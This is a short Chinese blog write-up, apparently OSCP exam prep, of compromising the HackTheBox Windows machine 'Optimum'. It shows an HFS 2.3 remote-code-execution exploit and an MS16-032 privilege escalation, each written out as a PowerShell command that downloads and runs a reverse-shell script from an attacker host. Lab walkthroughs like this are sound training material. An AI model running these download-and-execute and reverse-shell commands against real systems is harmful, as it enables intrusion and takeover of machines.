EthanDoctor

OSCP备考_0x39_HackThBox靶机_Windows_Optimum

Ethan医生2个月前靶场62


nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)

image.png


image.png

查看到版本是2.3,有rce

image.png



python3 49125.py 10.129.254.155 80  "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.43:8000/Invoke-PowerShellTcp.ps1')"


image.png

开始操作提权

查询漏洞

https://github.com/rayhan0x01/reverse-shell-able-exploit-pocs/blob/master/ms16-032.md 发现有MS16032漏洞

尝试上传挡案

image.png

下载后执行. 

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.16.43:8000/Invoke-PowerShellTcp.ps1')"

image.png

直接执行./Invoke-MS16032.ps1 直接拿下

image.png






标签: OSCP
返回列表

上一篇:OSCP备考_0x38_HackThBox靶机_Windows_Devel

下一篇:OSCP备考_0x40_HackThBox靶机_Windows_Bastard

相关文章

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.73.179 (扫描TCP)nmap -sU --top-ports 100 10.129.73....

OSCP备考_0x28_HackThBox靶机_Linux_blunder

OSCP备考_0x28_HackThBox靶机_Linux_blunder

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

OSCP备考_0x17_HackThBox靶机_Linux_Mirai

OSCP备考_0x17_HackThBox靶机_Linux_Mirai

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.122.40 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号